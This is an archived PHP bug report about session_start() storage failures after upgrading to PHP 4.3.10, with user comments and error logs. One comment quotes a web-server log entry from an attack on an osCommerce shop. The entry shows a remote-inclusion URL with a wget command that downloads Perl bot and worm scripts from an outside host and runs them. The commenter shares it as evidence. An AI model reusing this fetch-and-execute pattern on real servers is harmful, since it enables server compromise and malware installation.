ID: 25876 Comment by: anilk510 at yahoo dot co dot in Reported By: golden at riscom dot com Status: Feedback Bug Type: Session related Operating System: freebsd 4.8 PHP Version: 4.3.3 New Comment:
What is the path to session.save_path ..please let me know Previous Comments: ------------------------------------------------------------------------ [2004-12-27 11:41:02] phpbugs at expires-200501 dot dpits dot com i found some interesting. here the php-errorlog: [26-Dec-2004 15:37:40] PHP Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0 [26-Dec-2004 15:38:47] PHP Fatal error: session_start(): Failed to initialize storage module: user (path: /tmp/php_sessions) in /www/x/main.inc.php on line 20 and in the webserver-log i found this attack: x.x.x.x - - [26/Dec/2004:15:37:40 +0100] "GET /shop.php/cPath/2?osisSid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.0" 200 29102 "-" "LWP::Simple/5.53" (it is OSCommerce-Shop) Thankyou... ------------------------------------------------------------------------ [2004-12-27 10:34:09] [EMAIL PROTECTED] Not reproducible for me with Apache 1.3.29 & php4-CVS. Please provide more info on how to reproduce it. ------------------------------------------------------------------------ [2004-12-27 10:17:10] admin at ehost dot pl the same problem Apache 1.3.33 RedHat ES 3 and Redhat 9.0 from the moment that we upgrade php to 4.3.10 ------------------------------------------------------------------------ [2004-12-27 10:12:03] support at nthost dot ru Experiencing this bug on FreeBSD 4.9 with PHP 4.3.10. ------------------------------------------------------------------------ [2004-12-27 08:45:42] vsoletic at konix dot com All my websites experienced this problem after upgrade to 4.3.10. ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/25876 -- Edit this bug report at http://bugs.php.net/?id=25876&edit=1
